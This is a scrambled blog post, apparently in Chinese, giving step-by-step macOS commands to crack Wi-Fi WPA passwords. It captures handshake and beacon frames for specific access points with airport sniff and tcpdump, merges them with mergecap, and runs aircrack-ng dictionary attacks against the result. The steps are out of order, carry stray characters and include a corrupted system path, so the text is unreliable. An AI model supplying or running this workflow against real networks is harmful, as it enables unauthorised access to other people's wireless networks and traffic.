$ aircrack-ng -w dic.txt wifiCap/handshake.capĥ,跑字典 aircrack-ng -w pass.txt /tmp/airportSniffxNVV5o.capĪircrack-ng -w pass.txt -b e4:f3:f5:93:1b:42 /tmp/airportSniffxNVV5o.cap $ mergecap -a -F pcap -w handshake.cap beacon.cap cap.cap $ sudo tcpdump "ether proto 0x888e and ether host e4:f3:f5:93:1b:42" -I -U -vvv -i en1 -w cap.cap $ sudo tcpdump "ether proto 0x888e and ether host e4:f3:f5:33:11:22" -I -U -vvv -i en1 -w cap.cap Tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header ), capture size 262144 bytes $ sudo tcpdump "type mgt subtype beacon and ether src e4:f3:f5:33:11:22" -I -c 1 -i en1 -w beacon.cap WPA (1 handshake) 1成功抓到握手包 4.1,macos mojave airport sniff 报错 1,安装和更新aircrack-ng brew search aircrack-ngĪircrack-ng: stable 1.5.2 (bottled) 3,查看附近wifi sudo ln -s /System/Library/PrivateFrameworks/amework/Versions/Current/Resources/airport /usr/local/bin/airportġ 破解Wi-Fi信道CHANNEL aircrack-ng /tmp/airportSniffxNVV5o.cap | grep 1B:42Īircrack-ng airportSniffxQnNSI.cap | grep "1 handshake"
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |